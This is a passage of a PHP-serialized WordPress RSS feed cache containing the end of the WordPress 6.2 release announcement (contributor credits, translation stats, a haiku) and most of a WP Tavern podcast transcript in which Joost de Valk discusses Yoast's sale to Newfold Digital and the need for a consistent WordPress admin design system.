href=\"https://profiles.wordpress.org/sunyatasattva/\">sunyatasattva (a11n)</a> · <a href=\"https://profiles.wordpress.org/codemonksuvro/\">Suvro</a> · <a href=\"https://profiles.wordpress.org/syamraj24/\">syamraj24</a> · <a href=\"https://profiles.wordpress.org/cybr/\">Sybre Waaijer</a> · <a href=\"https://profiles.wordpress.org/afrin29/\">Syeda Sanjida Afrin</a> · <a href=\"https://profiles.wordpress.org/syhc/\">syhc</a> · <a href=\"https://profiles.wordpress.org/synchro/\">Synchro</a> · <a href=\"https://profiles.wordpress.org/syntaxart/\">syntaxart</a> · <a href=\"https://profiles.wordpress.org/szaqal21/\">szaqal21</a> · <a href=\"https://profiles.wordpress.org/tahmidulkarim/\">Tahmid ul Karim</a> · <a href=\"https://profiles.wordpress.org/tahminar27/\">Tahmina Rahman</a> · <a href=\"https://profiles.wordpress.org/inc2734/\">Takashi Kitajima</a> · <a href=\"https://profiles.wordpress.org/tanazmasaba/\">Tanaz Masaba</a> · <a href=\"https://profiles.wordpress.org/devtanbir/\">Tanbir Ahmod</a> · <a href=\"https://profiles.wordpress.org/tanner-m/\">Tanner Moushey</a> · <a href=\"https://profiles.wordpress.org/rahmantasnia/\">Tasnia Rahman Raima</a> · <a href=\"https://profiles.wordpress.org/teebee/\">teebee</a> · <a href=\"https://profiles.wordpress.org/tekapo/\">tekapo</a> · <a href=\"https://profiles.wordpress.org/thedaysse/\">thedaysse</a> · <a href=\"https://profiles.wordpress.org/iamjaydip/\">thejaydip</a> · <a href=\"https://profiles.wordpress.org/theode/\">theode</a> · <a href=\"https://profiles.wordpress.org/griffinjt/\">Thomas Griffin</a> · <a href=\"https://profiles.wordpress.org/thomasplevy/\">Thomas Patrick Levy</a> · <a href=\"https://profiles.wordpress.org/thomask/\">thomask</a> · <a href=\"https://profiles.wordpress.org/timbroddin/\">timbroddin</a> · <a href=\"https://profiles.wordpress.org/sippis/\">Timi Wahalahti</a> · <a href=\"https://profiles.wordpress.org/spaceshipone/\">Timoth&#233;e Brosille</a> · <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a> · <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a> · <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a> · <a href=\"https://profiles.wordpress.org/tjnowell/\">Tom J Nowell</a> · <a href=\"https://profiles.wordpress.org/dziudek/\">Tomasz Dziuda</a> · <a href=\"https://profiles.wordpress.org/skithund/\">Toni Viemer&#246;</a> · <a href=\"https://profiles.wordpress.org/starbuck/\">Tony G</a> · <a href=\"https://profiles.wordpress.org/hellofromtonya/\">Tonya Mork</a> · <a href=\"https://profiles.wordpress.org/zodiac1978/\">Torsten Landsiedel</a> · <a href=\"https://profiles.wordpress.org/toru/\">Toru Miki</a> · <a href=\"https://profiles.wordpress.org/itowhid06/\">Towhidul I Chowdhury</a> · <a href=\"https://profiles.wordpress.org/travisaxton/\">travisaxton</a> · <a href=\"https://profiles.wordpress.org/triumvirate/\">triumvirate</a> · <a href=\"https://profiles.wordpress.org/dinhtungdu/\">Tung Du</a> · <a href=\"https://profiles.wordpress.org/umesh84/\">Umesh Gupta</a> · <a href=\"https://profiles.wordpress.org/upadalavipul/\">upadalavipul</a> · <a href=\"https://profiles.wordpress.org/eboxnet/\">Vagelis</a> · <a href=\"https://profiles.wordpress.org/vcanales/\">Vicente Canales</a> · <a href=\"https://profiles.wordpress.org/szepeviktor/\">Viktor Sz&#233;pe</a> · <a href=\"https://profiles.wordpress.org/virgar/\">Virginie Garnier</a> · <a href=\"https://profiles.wordpress.org/elifvish/\">Vishal Kumar</a> · <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad T</a> · <a href=\"https://profiles.wordpress.org/vtad/\">vtad</a> · <a href=\"https://profiles.wordpress.org/vykesmac/\">vykesmac</a> · <a href=\"https://profiles.wordpress.org/webmandesign/\">WebMan Design &#124; Oliver Juhas</a> · <a href=\"https://profiles.wordpress.org/webrocker/\">Webrocker</a> · <a href=\"https://profiles.wordpress.org/websitegenii/\">websitegenii</a> · <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a> · <a href=\"https://profiles.wordpress.org/whaze/\">whaze</a> · <a href=\"https://profiles.wordpress.org/winterpsv/\">winterpsv</a> · <a href=\"https://profiles.wordpress.org/wojsmol/\">wojsmol</a> · <a href=\"https://profiles.wordpress.org/wojtekn/\">Wojtek Naruniec</a> · <a href=\"https://profiles.wordpress.org/wojtekszkutnik/\">Wojtek Szkutnik</a> · <a href=\"https://profiles.wordpress.org/fierevere/\">Yui</a> · <a href=\"https://profiles.wordpress.org/yuliyan/\">Yuliyan Slavchev</a> · <a href=\"https://profiles.wordpress.org/zebaafiashama/\">Zeba Afia Shama</a> · <a href=\"https://profiles.wordpress.org/zenaulislam/\">Zenaul Islam</a> · <a href=\"https://profiles.wordpress.org/zevilz/\">zevilz</a> · <a href=\"https://profiles.wordpress.org/zieladam/\">zieladam</a> · <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a></p>\n\n\n\n<p>By release day, <a href=\"https://translate.wordpress.org/stats/\">70 locales had translated 90 percent</a> or more of WordPress 6.2 in their language. Community translators are hard at work ensuring more translations are on their way. Thank you to everyone who helps to make WordPress 6.2 available in 200 languages.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A release haiku for 6.2&nbsp;</h2>\n\n\n\n<p>Six point two, so new<br />Shiny and ready for you<br />Congrats on hard work!</p>\n\n\n\n<p class=\"has-text-align-left has-tiny-font-size\"><em>* Portrait of Eric Allen Dolphy Jr. discovered via <a href=\"https://openverse.org/image/36720968-690c-4287-a2dd-619573cc23a6\">Openverse</a>. Colorization by D. Pountain; Original by F. Wolff</em>.<br />&#8220;<a rel=\"noreferrer noopener\" href=\"https://www.flickr.com/photos/98119031@N00/39509743850\" target=\"_blank\">eric dolphy</a>&#8221; by&nbsp;<a rel=\"noreferrer noopener\" href=\"https://www.flickr.com/photos/98119031@N00\" target=\"_blank\">dick_pountain</a>&nbsp;is licensed under&nbsp;<a rel=\"noreferrer noopener\" href=\"https://creativecommons.org/licenses/by-nc-sa/2.0/?ref=openverse\" target=\"_blank\">CC BY-NC-SA 2.0</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Mar 2023 18:57:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: #69 – Joost De Valk on What’s Happening After Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=143046\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wptavern.com/podcast/69-joost-de-valk-on-whats-happening-after-yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39389:\"Transcription<div>\n<p>[00:00:00] Nathan Wrigley: Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case, what the founder of Yoast is working on now.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast, player of choice, or by going to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m very keen to hear from you and hopefully get you or your idea featured on the show. Head to WPTavern.com forward slash contact forward slash jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today, we have Joost de Valk.</p>\n\n\n\n<p>If you&#8217;ve been in the WordPress space for any length of time, it&#8217;s likely that you&#8217;ve come across the Yoast SEO plugin. This was the brain child of the guests today, Joost. Same pronunciation, different spelling.</p>\n\n\n\n<p>We talk about how Joost found WordPress and quickly started working on his SEO plugin. How it rapidly grew and became his career.</p>\n\n\n\n<p>We discussed the WordPress landscape during this time, and whether it&#8217;s more difficult now to have the type of success that his plugin received, given that there are more players vying for our attention.</p>\n\n\n\n<p>The conversation then moves into why the plugin was recently sold to Newfold Digital. What were the guardrails that were put in place to ensure that the plugin continued and the employees felt safe?</p>\n\n\n\n<p>We then get into a conversation about Joost&#8217;s new role. He&#8217;s been tasked with reaching out to WordPress community members in order to see what projects or initiatives need more thought and support.</p>\n\n\n\n<p>This leads us into the topic of the current WordPress UI, and how Joost is hoping for a refresh at some point soon. For years, his plugin team wanted to create their own UI to take advantage of new technologies, but Joost always pushed back, preferring instead to adopt the style of the WordPress UI. Now that&#8217;s changed, and the open sourcing of the UI kit they&#8217;ve made is intended as a starting point for a discussion about the need for a more consistent admin experience for all WordPress users.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading over to WPTavern.com forward slash podcast. Where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Joost de Valk.</p>\n\n\n\n<p>I am joined on the podcast today by Joost de Valk. Hello Joost.</p>\n\n\n\n<p>[00:03:32] Joost de Valk: Hey, thank you for having me.</p>\n\n\n\n<p>[00:03:34] Nathan Wrigley: You are very, very welcome. It&#8217;s an absolute pleasure to have somebody of your stature in the WordPress community. You&#8217;ve been with WordPress for a really long time. Certainly whilst I&#8217;ve been using WordPress, I joined the party a little bit later than a lot of people. But your company and your name was already a really big deal.</p>\n\n\n\n<p>If anybody hasn&#8217;t heard of you, I&#8217;d appreciate it if just for a few minutes, you could just give us a little bit of your background story. Where you are, what companies you&#8217;ve worked for, how on earth did you get into WordPress and so on.</p>\n\n\n\n<p>[00:04:05] Joost de Valk: Okay, so that&#8217;s a lot to cover, but let me try. So, I am Joost. I&#8217;m Dutch. I live in the Netherlands with my lovely wife Marieke, who I think you&#8217;ve also had on your show, and our four kids.</p>\n\n\n\n<p>I started Yoast coming from a background of working in several different IT companies. I started university, basically failed at university because I wasn&#8217;t a very good student. Then started working in IT, in a web hosting company. And later on moved into an SEO company where I learned SEO consulting.</p>\n\n\n\n<p>When I started doing that, I had already been coding a bit. I&#8217;ve actually always been coding since I was 12. I built my first website when I was 12, which was in 1994, so you can do the math. I&#8217;d been working on that and I, I learned SEO at this company. Started blogging, and then also started building plugins for the blog platform that I chose, which happened to be WordPress. Building plugins to basically fix my own SEO needs. This was in 2005, 2006. So that&#8217;s relatively early days.</p>\n\n\n\n<p>I started contributing to WordPress Core at basically the same time. I&#8217;d been doing other open source software development. I was a part of the WebKit project, which is the core of Safari, and Chrome. Actually committer in that project before I joined the WordPress world.</p>\n\n\n\n<p>And I had two sites. I had one where I blogged about SEO, and one where I blogged about CSS. And my specialty at that time was CSS 3, which was at that point being created, and I was creating CSS 3 previews. So I was doing SEO for that, building my own plugins, just for myself. And I started releasing them and more people started using them. I started speaking at SEO conferences, and people started asking about these plugins.</p>\n\n\n\n<p>And one thing led to another. And some point in 2010 I decided to start working on my own. At that point thinking I would never hire anybody, but I would just be an SEO consultant, which is why I called the company after myself. Which in hindsight was a stupid idea, because whilst it is a very beautiful brand name, it is super annoying to hear your own name the whole day, because you can&#8217;t really not hear that.</p>\n\n\n\n<p>So, did that in 2010. Basically started SEO consulting. I was consulting for pretty large brands at that time, Facebook, eBay, the Guardian, companies like that. And, well I was still doing that plugin. Decided to bundle the several small plugins that I&#8217;d built into one larger WordPress SEO plugin, which later on became the Yoast SEO plugin.</p>\n\n\n\n<p>And then, at some point during 2011, I hit a million users with what was called WordPress SEO at the time. And Marieke said to me, you can&#8217;t keep doing this. You either have to start making money from this, or stop doing it, because this is nonsense. And she was, as always, right.</p>\n\n\n\n<p>And then started working on that. And she joined quite quickly. Had a couple of other colleagues who I&#8217;d hired to do part of the other work that I was doing at that point already. And we started building, and that went quite well for a very long time. So we sold in 2021, and at that point we had almost 150 employees, and a very well running business. So we&#8217;d been growing between 30 and 50% year over year for almost a decade. And yeah, it&#8217;s been a very interesting journey. And throughout that time I&#8217;ve been doing WordPress, because I love WordPress as a system, and I love the open source community.</p>\n\n\n\n<p>[00:08:05] Nathan Wrigley: I have a quick comment in here and I love how you described it, your successes. We did quite well. To get a million users in the space of, well, it sounds like under a year.</p>\n\n\n\n<p>[00:08:17] Joost de Valk: Well, no, it was, it was slightly more because it was, I had small plugins that people were already using, and then I bundled them into one. So I was basically combining all these user bases. But yeah, no, it, it did go very quickly. So a fairly limited amount of companies I&#8217;ve seen that do it quickly, although I have to say if you look at Elementor, similar and better actually.</p>\n\n\n\n<p>[00:08:39] Nathan Wrigley: When you look back at that time, do you consider that you entered WordPress at what might be described as halcyon days or something? Was there just something about it at that time, which was ripe for the picking? Because the growth from zero to a million, I mean very, very few plugins managed to jump that hurdle. And the fact that you did it, let&#8217;s say, relatively quickly, really quickly in fact, is pretty amazing. But I just wondered if the, if it was more wild west back then? If it was more possible because there was less competition, there was less rivals in the space. Do you have any insight into why it was so successful?</p>\n\n\n\n<p>[00:09:19] Joost de Valk: So part of it is that the people that were building WordPress sites at that time were, almost all of them developers, or at least website maintainers with a fairly good technical grasp. And they switched plugins fairly easily and often. I think that was a bit easier than it is now. Although that group is still there, but it&#8217;s just a smaller portion of the entire user base of WordPress now.</p>\n\n\n\n<p>So yeah, it was a bit different. It was a bit more pioneering I think, in a way. The thing is, we build these ginormous websites on WordPress now, right? So these enormously important websites as well to people. And you&#8217;re not going to play around with plugins on sites like that. So it&#8217;s on personal blogs that you can do that. And just a lot more people did have a personal blog at that time. It was probably the best days for the actual blogoshpere in comparison to what later happened with Twitter, et cetera.</p>\n\n\n\n<p>[00:10:19] Nathan Wrigley: We probably could spend the entire podcast talking about Yoast over the years, but we&#8217;re not going to do that, because we&#8217;ve decided to take a different route. But I, do want to ask, in terms of your journey since the day that you committed to having Yoast a plugin, right through to maybe today, maybe a year or two ago.</p>\n\n\n\n<p>Were you always in love with WordPress, the community and so on? I get the feeling that there might have been a few wrinkles along the way where the whole ecosystem was something that you wanted a little bit of a break from. I could be getting that wrong. If so, ignore the question.</p>\n\n\n\n<p>[00:10:53] Joost de Valk: I don&#8217;t think I&#8217;ve ever really wanted a break from WordPress itself. I think the community is a wonderful thing, but at the same time it&#8217;s very brittle. People come and go, and that&#8217;s fine, right? But we, I feel, have failed in the last few years especially to, well to show our excitement for it to each other.</p>\n\n\n\n<p>I think part of that is Covid, because there weren&#8217;t as many WordCamps and other things while we did that. Part of that is also, we&#8217;re all growing up and all these companies are becoming bigger and, well the demands on those companies are getting bigger. But it&#8217;s also like we&#8217;re getting more professional, but with that maybe also a bit more dull</p>\n\n\n\n<p>[00:11:37] Nathan Wrigley: So you&#8217;re still committed to WordPress. Is that the case? Are you going to be with WordPress do you imagine 3 or 4, 5, 10 years from now? You&#8217;ll still be coming on podcasts like this and talking about WordPress, albeit in a different role?</p>\n\n\n\n<p>[00:11:51] Joost de Valk: I absolutely hope so, yeah. If I wasn&#8217;t thinking that, I wouldn&#8217;t have taken on this new role that I took on at Newfold.</p>\n\n\n\n<p>[00:11:58] Nathan Wrigley: Yeah, let&#8217;s talk about that. But before we get onto that, I would imagine there&#8217;s a subset of users who know that Yoast as a plugin exists, but they may not know about the ownership and the structure and how it&#8217;s all run and what have you. Just run us through that little piece. A little while ago it was announced that you had sold to Newfold Digital. What was the reasoning behind that? So that could be maybe there were personal reasons behind that. Maybe it was just something that you wanted to get away from and give yourself a bit of head space, try something new. What was going on in the run up to that, and how did it all go?</p>\n\n\n\n<p>[00:12:32] Joost de Valk: So, well running a company&#8217;s hard. And as a company becomes bigger, it becomes harder. And during Covid, Marieke and I decided it&#8217;s time. It&#8217;s time to, to sell it and to look at, like, hey, what else do we want to do? And we were talking about that to our other partners. I think we all felt the same at that point.</p>\n\n\n\n<p>And so we went into a process. We actually engaged a banker who helped us sell the company. And we ended up with Newfold Digital, which is not really a household name, but it&#8217;s the parent company to companies like Bluehost, Hostgator, domain.com, and multiple dozens of other brands.</p>\n\n\n\n<p>They put in a good offer, but they also had a very good story about why they wanted to buy Yoast, and what they would do with it. And that really was very interesting to us. And then, they ended up after acquiring us, quite quickly after that, they also acquired Yith. A WooCommerce plugin shop, also from Europe. It&#8217;s been good. It&#8217;s a very nice group of people.</p>\n\n\n\n<p>[00:13:41] Nathan Wrigley: With the transition there, when you went out and as you said, you got some third party in, who obviously had your best interest, but also presumably could be somewhat dispassionate as well. Did you have any sort of guardrails? Because you described that you&#8217;d grown from, well, you solo up to 150 employees, and just before we hit record, you were mentioning that in some cases, some of your employees have been there for as much as a decade. You know, there&#8217;s a real long heritage of people working there. So presumably a lot of these people, you&#8217;re very close to them. Friends you might say.</p>\n\n\n\n<p>[00:14:15] Joost de Valk: Absolutely, yes.</p>\n\n\n\n<p>[00:14:17] Nathan Wrigley: I presume part of that process was protecting them, knowing that when you stepped away and released the reins, that whoever took over the reins was going to behave in a way that you would have behaved. Did you get into that? Did you struggle with that? Was there any, any pieces that you needed to in place?</p>\n\n\n\n<p>[00:14:36] Joost de Valk: It&#8217;s definitely a part of why you&#8217;re thinking very long and hard about who you&#8217;re selling your company to. To some extent, we don&#8217;t need to do all the defense because there&#8217;s Dutch law that will actually prevent them from just firing people. If I lived in an at will firing world, I would probably think about this even more specifically.</p>\n\n\n\n<p>But, honestly it was never a question, they wanted the people. And they wanted everyone to come board and to stay on. And actually in the first year after we sold to Newfold, nobody left. Or in the first six months, I should probably say, I don&#8217;t know whether it&#8217;s entirely true for the first year. Nobody left for a long time.</p>\n\n\n\n<p>No, I think actually treating your employees well is super important. To be fair, that&#8217;s always been one of the things that Marieke has run at our company. So for a long time I was the CEO, then she took over from me. So she was the CEO for the last three years before we sold. Well, she did a tremendous job at making well, creating that culture and making it even better.</p>\n\n\n\n<p>We do indeed have quite a few people that work here for, well, five years or longer. And a couple of them, two people now who are at a decade and one is closing in, yeah.</p>\n\n\n\n<p>[00:15:51] Nathan Wrigley: You mentioned, I can&#8217;t remember whether it was in the conversation we&#8217;ve just had or whether I read it in some show notes. But Newfeld Digital, the company that you ultimately sold for. This for now at least, this is the direction of travel for you. What&#8217;s the role that you&#8217;ve taken on there and what are the sort of key points that you are trying to achieve? You also mentioned that it&#8217;s not a household name. I suspect there&#8217;s some will to change that might be part of your role.</p>\n\n\n\n<p>[00:16:15] Joost de Valk: Not necessarily, I mean, Newford is a corporate brand mostly aimed at other things than, it&#8217;s not like we need everyone to know Newford. But I do think it&#8217;s, well the combination of Bluehost and Yith and Yoast, and quite a few other things under our umbrella make us quite a big player in the WordPress world. We are, I think, the biggest or the second biggest WordPress host out there. Maybe GoDaddy&#8217;s bigger, I honestly don&#8217;t know.</p>\n\n\n\n<p>So my role specifically for the foreseeable future, is to look at hey, what&#8217;s happening in the WordPress world? How can Newfold help WordPress, and what can we do in the WordPress world that would benefit both Newfold and the WordPress world?</p>\n\n\n\n<p>And how can we use our knowledge of WordPress internally a bit better as well. It&#8217;s funny how this works at large hosts and these are, Newfold is not unique in that I&#8217;ve found. I&#8217;ve been talking to other people in the hosting space a lot in the last few months. A lot of these hosting companies, only in the last few years have started realizing that they&#8217;re actually WordPress companies.</p>\n\n\n\n<p>There&#8217;s a bit of a catch up to do there. Well, it&#8217;s one of the things that I want to focus on is like, how can we see that these large hosts who make a lot of money on WordPress and who together create quite a big economy, that they contribute back to WordPress as well? And what can we do about that?</p>\n\n\n\n<p>[00:17:40] Nathan Wrigley: So if I&#8217;m right, your role is head of WordPress strategy for Newfold Digital? That is a part of it. It&#8217;s just trying to figure out where WordPress fits in the overall structure, the products that you&#8217;ve got, the direction that you&#8217;re going to take, the events that you&#8217;re going to show up to, and all of that?</p>\n\n\n\n<p>[00:17:57] Joost de Valk: Yeah, absolutely. And it is honestly, it&#8217;s sort of a perfect role because I have no one reporting to me, and yet I get to talk about these things, which I love.</p>\n\n\n\n<p>[00:18:08] Nathan Wrigley: What have been some of the things that you have been mulling over that at Newfold you think you might like to get your hands dirty on?</p>\n\n\n\n<p>[00:18:15] Joost de Valk: Well, I think it actually ties into one of the other things you wanted to talk about, which is the WordPress Admin UI. So we did a new settings UI for Yoast, and as I was looking at it and we were building that. I was talking to my colleagues at Newfold responsible for the Bluehost interface and for Yith, and we were like, hey, can&#8217;t we just use this across the company?</p>\n\n\n\n<p>So it&#8217;s stuff like that where we, we help each other with our knowledge of WordPress. And we also let people who are good at one specific thing inside WordPress do that. But it&#8217;s also like, okay, we have a couple of different teams of WordPress Core contributors within Newfold. How can we effectively use those?</p>\n\n\n\n<p>So yeah, there&#8217;s a lot of different angles to it. There&#8217;s how do we make more money from WordPress? What direction does WordPress need to go, and how can we help that? How do we make WordPress better usable for our customers so that we actually maintain our customers better? There&#8217;s a lot of different things to do.</p>\n\n\n\n<p>[00:19:17] Nathan Wrigley: You&#8217;ve been really keen publishing statistics over the years about WordPress adoption and WordPress usage and all of those kind of things. So it really does seem like the perfect role for you. You&#8217;re very interested in the bigger picture of WordPress and how widely it&#8217;s adopted and whether the numbers are going up or going down and publishing data about all that. Yeah, it&#8217;s fascinating.</p>\n\n\n\n<p>[00:19:35] Joost de Valk: It is. WordPress is just a perfect project for a large number of the websites out there. And honestly, I think that we, that we don&#8217;t always do ourselves a good service as WordPress on marketing what we can do. And we&#8217;ve also, I think, underinvested a little in some parts of WordPress, in terms of performance and in terms of onboarding, that we should probably invest a bit more in.</p>\n\n\n\n<p>[00:20:02] Nathan Wrigley: Yeah, that&#8217;s an interesting point. Just as a segue, the whole performance thing, not the onboarding piece, but the performance bit in particular. I feel that&#8217;s, that&#8217;s really been kickstarted over the last 12 months. There seems to be a lot of work going into performance and a lot of chatter about it.</p>\n\n\n\n<p>Whether everything should be bundled into one performance plugin or whether it should be split out and become different canonical plugins, if you like. So I think you&#8217;re right. I think it&#8217;s quite interesting that some of the things that you&#8217;ve just mentioned do seem to be getting some attention, and performance is just one that springs to mind.</p>\n\n\n\n<p>[00:20:36] Joost de Valk: Things like performance on an individual site level, they&#8217;re important, but if you are the host that is hosting literally millions of WordPress sites. It is just literally also cost to your bottom line.</p>\n\n\n\n<p>[00:20:49] Nathan Wrigley: Yeah, I hadn&#8217;t really thought about it from that perspective. But if you can shave, I don&#8217;t know, 5% of CPU cycles out of the whole hosting platform, that&#8217;s quite a large amount of money that you&#8217;ve saved.</p>\n\n\n\n<p>[00:20:59] Joost de Valk: Yeah, and we did a lot more than that in recent releases. So it&#8217;s been in the double digits. And that&#8217;s absolutely a good thing for, well, not just for our bottom line, but for nature and for electricity usage. I mean, there&#8217;s tons of reasons to want to do better at that. And I think there&#8217;s still a lot more that we could do.</p>\n\n\n\n<p>[00:21:21] Nathan Wrigley: I think it does seem genuinely to be a perfect role given, well, given that I don&#8217;t know you particularly well, but from all of the things that I&#8217;ve read over the years, it seems like this is kind of like a match made in heaven.</p>\n\n\n\n<p>[00:21:32] Joost de Valk: Yeah, and it is actually a very nice team. So it&#8217;s, it is very nice to be able to work with these people, and look at like, hey, what can we do here? And yeah, I hope to be able to make an impact.</p>\n\n\n\n<p>[00:21:42] Nathan Wrigley: Let&#8217;s talk about the UI, because over the years, if you&#8217;ve been using WordPress for all these years, you must have logged into WordPress, oh, I daren&#8217;t even count. But it&#8217;s probably multiple tens of thousands of times. And each time you&#8217;ve logged in, you&#8217;ve stared at the same UI. And certainly over the last decade, that UI has been exactly the same.</p>\n\n\n\n<p>It basically has looked the same since I started WordPress, with tiny, teeny modifications to things like the color blue. There&#8217;s a slight variation in the color blue that&#8217;s being used now than previously. But broadly speaking, it&#8217;s exactly the same.</p>\n\n\n\n<p>You guys, and we&#8217;re going to use Yoast as an example, but it really, it could be any company. You guys took it into your own hands to say, enough. We think that the UI, if we stick with WordPress standard UI, it doesn&#8217;t really fit what we&#8217;re doing. Technology&#8217;s moved on. We&#8217;ve got more things available to us. Certainly the way things look in WordPress is beginning to be a little bit tired.</p>\n\n\n\n<p>Tell me about that journey. And are you hoping that your free UI kit, that you&#8217;ve open sourced is going to be taken on? Maybe it&#8217;s a cue for the team over at .org to have a look at this and adopt this across WordPress, dare I say?</p>\n\n\n\n<p>[00:22:53] Joost de Valk: I honestly doubt that&#8217;ll happen. Yeah, no, I doubt that. Not because they are against using something that we&#8217;ve built, but because what we build is quite opinionated and uses stuff that they might not be willing to use, like Tailwind.</p>\n\n\n\n<p>It definitely needs a change. It&#8217;s been a tired look for, well, almost a decade as well now. We&#8217;ve had experiments. We&#8217;ve not really moved on that. Gutenberg itself has changed in what it looks like a couple of times over its development, and now we&#8217;re basically stuck with three different types of designs, even within the WordPress admin.</p>\n\n\n\n<p>[00:23:29] Nathan Wrigley: Yeah, tell us what you mean by that because I&#8217;m not sure everybody will pick up the nuance of that.</p>\n\n\n\n<p>[00:23:33] Joost de Valk: Well, if you look at the site health page, it uses different styling from say, add a post. And then go into a post and you edit it in Gutenberg, then that looks entirely different as well. And, I just think that&#8217;s weird. I think it&#8217;s weird that we have different types of buttons. I think it&#8217;s weird that we basically teach a user two or three different UIs. And if you use the customizer with it, then even more. So you&#8217;re basically teaching people new user experiences all the time, and that makes it hard to use.</p>\n\n\n\n<p>And then because there is no real design system for WordPress anymore, that you can use to build your plugin&#8217;s admin pages, everyone starts building their own and all of them start looking differently. And that means that if you have five plugins, you have five different admin pages. And I just don&#8217;t think that that&#8217;s a good experience.</p>\n\n\n\n<p>[00:24:35] Nathan Wrigley: Yeah, I guess if you are a user of WordPress, a frequent user of WordPress, and you&#8217;ve got let&#8217;s say, the one site that you are maintaining all five sites or whatever it may be. Because you&#8217;re in there all the time, that dissonance doesn&#8217;t really happen for you as much, does it? You know, you&#8217;re just familiar with it.</p>\n\n\n\n<p>Okay. If I go in here, I&#8217;m going to expect that the menu&#8217;s going to change. The whole color palette and everything. The buttons will look different, but okay, that&#8217;s how it is. But if WordPress continues to grow, and it wants to get into the late forties and early 50%, which is, I guess, a target which is within reach. That isn&#8217;t really going to fly anymore, is it?</p>\n\n\n\n<p>Because if you go to any SaaS app, let&#8217;s say for example, I don&#8217;t know, let&#8217;s say you go over to Google and you want to interact with Google Docs, it would be really weird if the UI for Docs was different from spreadsheets. And, I don&#8217;t know, let&#8217;s say that you are using Notion or Evernote or something like that. If when you went into some portion of it, it was just different.</p>\n\n\n\n<p>You just fully expect everything to look and feel the same. And in our own experience of WordPress, we just forgive that, don&#8217;t we? We just, oh, okay, that plugin author has done this. But if you are looking to compete against the rising stars, Wix, Squarespace, Shopify, all these other things, that really starts to matter.</p>\n\n\n\n<p>It&#8217;s a bit like death by a thousand teeny, tiny little paper cuts. Those things stick in the head of the end user. That just seems a bit unprofessional. Not sure about this WordPress thing. Do you think I&#8217;ve hit the target there?</p>\n\n\n\n<p>[00:26:08] Joost de Valk: Yeah, no, absolutely. I think that is our problem. I think it actually ties into the other thing I mentioned, the onboarding. It&#8217;s actually pretty hard to start using WordPress. So you are thrown into a dashboard and then the first thing you&#8217;re greeted with is WordPress meetups. And as much as I love WordPress meetups, if you are just on that page for the first time, why are those in my screen?</p>\n\n\n\n<p>And, well there&#8217;s a hundred things like that where I think that we, we could and probably should do better. And the first thing would be, in my opinion, a design system that we all agree on. And I think that is actually an achievable goal. I spoke a bit, before and after I published my post, to a couple of people from the design team, Joan and Mathias, and they also seemed to want something like that.</p>\n\n\n\n<p>We seem to disagree a bit on how far, in how far that actually already exists. Because there is a somewhat of a component system within Gutenberg. I just think that as long as I search for WordPress design system and don&#8217;t get a post or page from WordPress.org, that actually explains the design system in simple to use terms for every plugin developer out there, it doesn&#8217;t exist.</p>\n\n\n\n<p>That means that we have to build it. We have to market it. We have to think about how it&#8217;s going to be used and then write good docs for that. That&#8217;s quite a bit of work, but it&#8217;s not unconceivable that we do that. There&#8217;s a lot of people in the WordPress world who want to make that happen. We&#8217;re just not prioritizing it at the moment. And I think we&#8217;re doing ourselves a disservice by not doing that.</p>\n\n\n\n<p>[00:27:45] Nathan Wrigley: I am going to link in the show notes to an article that you put out recently where you express a lot of these thoughts. And in it you make the point that it was a really difficult decision over at Yoast. Sorry to keep going back to Yoast.</p>\n\n\n\n<p>[00:27:59] Joost de Valk: No, it&#8217;s not a problem. It was a very difficult decision. We&#8217;ve been literally been talking about this for five, six years, and my UX team at Yoast had been wanting to do a redesign for a long time, and I basically stopped them all the time because I was like, I want to stay in line with the WordPress admin.</p>\n\n\n\n<p>And over time we started moving away from it more and more because we 